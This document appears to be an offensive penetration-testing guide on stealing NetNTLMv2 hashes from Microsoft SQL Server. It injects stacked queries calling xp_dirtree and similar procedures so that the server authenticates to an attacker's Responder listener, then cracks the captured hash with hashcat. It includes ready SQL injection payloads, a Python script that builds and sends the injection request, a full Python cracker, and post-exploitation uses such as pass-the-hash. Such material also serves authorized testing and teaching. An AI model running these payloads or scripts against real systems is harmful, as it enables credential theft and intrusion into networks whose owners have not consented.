Leaking NetNTLM Hashes
Overview
Database administrators often run the MSSQL service under a domain or local service account so it can reach network shares. If we find a SQL injection that permits stacked queries, we can make the SQL Server connect to an SMB server we control; the service account authenticates to it with NTLM, and we capture the NetNTLMv2 challenge-response for offline cracking. xp_dirtree (like xp_fileexist and xp_subdirs) is executable by any login by default, so this does not require sysadmin rights.
Attack Flow
1. Start Responder (SMB listener)
2. Inject xp_dirtree to access our "share"
3. Capture NetNTLM hash
4. Crack hash with hashcat
Step 1: Start Responder
Clone Repository
git clone https://github.com/lgandx/Responder
cd Responder
Start Listening
sudo python3 Responder.py -I tun0
Use the interface the SQL server will connect back to (here tun0, the VPN interface); the IP in the injected UNC path must be that interface's address.
Verify SMB is ON:
Responder prints the status of each poisoner and server at startup. If SMB shows OFF, edit Responder.conf, set SMB = On and restart Responder.
Step 2: Trigger SMB Authentication
SQL Query
EXEC master..xp_dirtree '\\10.10.15.75\myshare', 1, 1;
This asks SQL Server to list the contents of a share on our host (depth 1, files included). The share does not have to exist: reaching it requires SMB authentication, so the service account sends an NTLM response to Responder, which records it.
SQLi Payload
';EXEC master..xp_dirtree '\\10.10.15.75\myshare', 1, 1;--
The leading quote closes the injected string, the semicolon stacks our procedure call, and -- comments out the rest of the original query.
URL Encode
Output: '%3BEXEC%20master..xp_dirtree%20'%5C%5C10.10.15.75%5Cmyshare'%2C%201%2C%201%3B--
Send Request
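The payload construction above, as an added Python example (not code from the original page): it builds the stacked-query payload for each of the three coercion procedures and URL-encodes it the way the page's output shows, with the quotes left literal and everything else escaped. The target URL and parameter name in trigger_url() are illustrative assumptions; trigger() performs a live request and is not called unless you invoke it.

```python
# Added example, not code from the original page: build the stacked-query
# payloads for xp_dirtree / xp_fileexist / xp_subdirs and URL-encode them
# exactly as the page's output shows. Target URL and parameter are assumptions.
from urllib.error import HTTPError
from urllib.parse import quote
from urllib.request import urlopen

# UNC path pieces are filled in with str.format; the share never has to exist.
COERCION_PROCS = {
    "xp_dirtree": "EXEC master..xp_dirtree '\\\\{ip}\\{share}', 1, 1;",
    "xp_fileexist": "EXEC master..xp_fileexist '\\\\{ip}\\{share}\\{file}';",
    "xp_subdirs": "EXEC master..xp_subdirs '\\\\{ip}\\{share}';",
}


def coercion_query(proc: str, ip: str, share: str, file: str = "x") -> str:
    """Plain T-SQL that makes the SQL Server service account touch our share."""
    return COERCION_PROCS[proc].format(ip=ip, share=share, file=file)


def sqli_payload(query: str) -> str:
    """Break out of a single-quoted string, stack our statement, comment out the rest."""
    return "';" + query + "--"


def url_encode(payload: str) -> str:
    # quote() leaves letters, digits and _.-~ alone; keeping the single quotes
    # literal as well reproduces the page's encoded output character for character.
    return quote(payload, safe="'")


def trigger_url(base: str, param: str, proc: str, ip: str, share: str) -> str:
    """Assumed GET-based injection point, e.g. https://target/search?q=<payload>."""
    return f"{base}?{param}={url_encode(sqli_payload(coercion_query(proc, ip, share)))}"


def trigger(base: str, param: str, proc: str, ip: str, share: str, timeout: float = 10) -> int:
    """Send the request. The HTTP status does not matter: a 500 caused by the
    stacked statement still means the SMB authentication already happened."""
    try:
        with urlopen(trigger_url(base, param, proc, ip, share), timeout=timeout) as resp:
            return resp.status
    except HTTPError as err:
        return err.code


if __name__ == "__main__":
    for proc in COERCION_PROCS:
        print(trigger_url("https://target.example/search", "q", proc, "10.10.15.75", "myshare"))
```

If the injection point is in a POST body or a header, only trigger_url()/trigger() change; the encoded payload is the same.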
Step 3: Capture Hash
Responder Output
Captured:
Client IP: 192.168.43.156
Username: SQL01\jason
Hash: NetNTLMv2 hash
Responder also saves each capture under its logs/ directory as SMB-NTLMv2-SSP-<client IP>.txt; that file is what we feed to hashcat.
Step 4: Crack the Hash
Hashcat Command
hashcat -m 5600 <hash file> <wordlist>
Mode 5600 selects NetNTLMv2 (5500 is NetNTLMv1). The hash file holds the line Responder logged, username::domain prefix included; hashcat --show prints the cracked password afterwards.
Full Example
Output
Alternative SMB Coercion Methods
xp_dirtree
EXEC master..xp_dirtree '\\IP\share', 1, 1;
xp_fileexist
EXEC master..xp_fileexist '\\IP\share\file';
xp_subdirs
EXEC master..xp_subdirs '\\IP\share';
Complete Attack Chain
Hash Format Reference
NetNTLMv2 Format
user::domain:server_challenge:NTProofStr:blob
The server challenge is 16 hex characters, NTProofStr (an HMAC-MD5) is 32, and the blob is the variable-length client data that went into the HMAC. This is a challenge-response, not a stored password hash: it can be cracked offline but not passed like an NT hash.
Hashcat Mode
NetNTLMv1: 5500
NetNTLMv2: 5600
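To make the format reference and the cracking step concrete, here is an added Python example (not code from the original page or from Responder/hashcat) that reimplements the per-candidate check hashcat -m 5600 performs: parse a Responder NetNTLMv2 line, recompute NTProofStr = HMAC-MD5(NTLMv2 key, challenge || blob) for a candidate password, and compare. MD4 is implemented inline because hashlib.new("md4") is unavailable on many OpenSSL 3 builds of Python. The user and domain reuse the page's SQL01\jason; the challenge, blob and password "Summer2024!" are constructed sample data, not values captured from the page's target.

```python
# Added example, not code from the original page: what hashcat -m 5600 checks
# for each candidate password. Sample challenge/blob/password are constructed.
import hashlib
import hmac
import struct
from typing import Iterable, Optional

MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, needed for the NT hash (not in every hashlib build)."""
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    r2k = (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)
    r3k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)

    msg = bytearray(data) + b"\x80"          # pad: 0x80, zeros, 64-bit LE bit length
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)

    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):                  # round 1
            aa = rotl((aa + f(bb, cc, dd) + x[i]) & MASK, (3, 7, 11, 19)[i % 4])
            aa, bb, cc, dd = dd, aa, bb, cc
        for i in range(16):                  # round 2
            aa = rotl((aa + g(bb, cc, dd) + x[r2k[i]] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4])
            aa, bb, cc, dd = dd, aa, bb, cc
        for i in range(16):                  # round 3
            aa = rotl((aa + h(bb, cc, dd) + x[r3k[i]] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4])
            aa, bb, cc, dd = dd, aa, bb, cc
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16le"))


def ntlmv2_line(password: str, user: str, domain: str, challenge: bytes, blob: bytes) -> str:
    """The line Responder logs for a user who authenticated with this password."""
    key = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()
    proof = hmac.new(key, challenge + blob, hashlib.md5).digest()
    return f"{user}::{domain}:{challenge.hex()}:{proof.hex()}:{blob.hex()}"


def parse_netntlm(line: str) -> dict:
    """Split a Responder line and pick the hashcat mode from the field widths."""
    user, _, domain, f1, f2, f3 = line.strip().split(":")
    if len(f1) == 48 and len(f2) == 48 and len(f3) == 16:   # v1: LM resp, NT resp, challenge
        return {"user": user, "domain": domain, "mode": 5500}
    if len(f1) == 16 and len(f2) == 32:                      # v2: challenge, NTProofStr, blob
        return {"user": user, "domain": domain, "mode": 5600,
                "challenge": f1, "proof": f2, "blob": f3}
    raise ValueError("not a NetNTLMv1/v2 line")


def check_candidate(line: str, candidate: str) -> bool:
    """The per-candidate test behind hashcat -m 5600."""
    h = parse_netntlm(line)
    if h["mode"] != 5600:
        raise ValueError("only NetNTLMv2 is implemented here")
    rebuilt = ntlmv2_line(candidate, h["user"], h["domain"],
                          bytes.fromhex(h["challenge"]), bytes.fromhex(h["blob"]))
    return hmac.compare_digest(rebuilt.split(":")[4], h["proof"])


def crack(line: str, wordlist: Iterable[str]) -> Optional[str]:
    for word in wordlist:
        if check_candidate(line, word):
            return word
    return None


# Constructed sample: temp-response blob (version header, timestamp, client
# nonce, empty AV pair list) plus a fixed server challenge and a made-up password.
SAMPLE_BLOB = bytes.fromhex("0101000000000000" "0000000000000000"
                            "aabbccddeeff0011" "00000000" "00000000" "00000000")
SAMPLE_LINE = ntlmv2_line("Summer2024!", "jason", "SQL01",
                          bytes.fromhex("1122334455667788"), SAMPLE_BLOB)

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("hashcat mode:", parse_netntlm(SAMPLE_LINE)["mode"])
    print("cracked:", crack(SAMPLE_LINE, ["password", "Winter2024!", "Summer2024!"]))
```

Because the check is a plain MD4 plus two HMAC-MD5s per candidate, hashcat gets through large wordlists and rule sets quickly; the only defence on the target side is a password that is not in them.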
Troubleshooting
No Hash Captured
Verify Responder SMB is ON
Check that the SQL server can reach our host on TCP 445 (outbound 445 is often filtered at the network edge)
Verify network connectivity
Try different coercion method
Hash Won't Crack
Try larger wordlist
Add rules, e.g. -r /usr/share/hashcat/rules/best64.rule
The password may simply be strong (not in any wordlist)
Use Cases
After cracking password:
WinRM access (if enabled)
RDP access (if enabled)
SMB access to file shares
Pass-the-hash (using the NT hash of the cracked password; the captured NetNTLMv2 response itself cannot be passed)
Privilege escalation
Quick Reference
Responder: sudo python3 Responder.py -I tun0
Payload: ';EXEC master..xp_dirtree '\\IP\share', 1, 1;--
Crack: hashcat -m 5600 <hash file> <wordlist>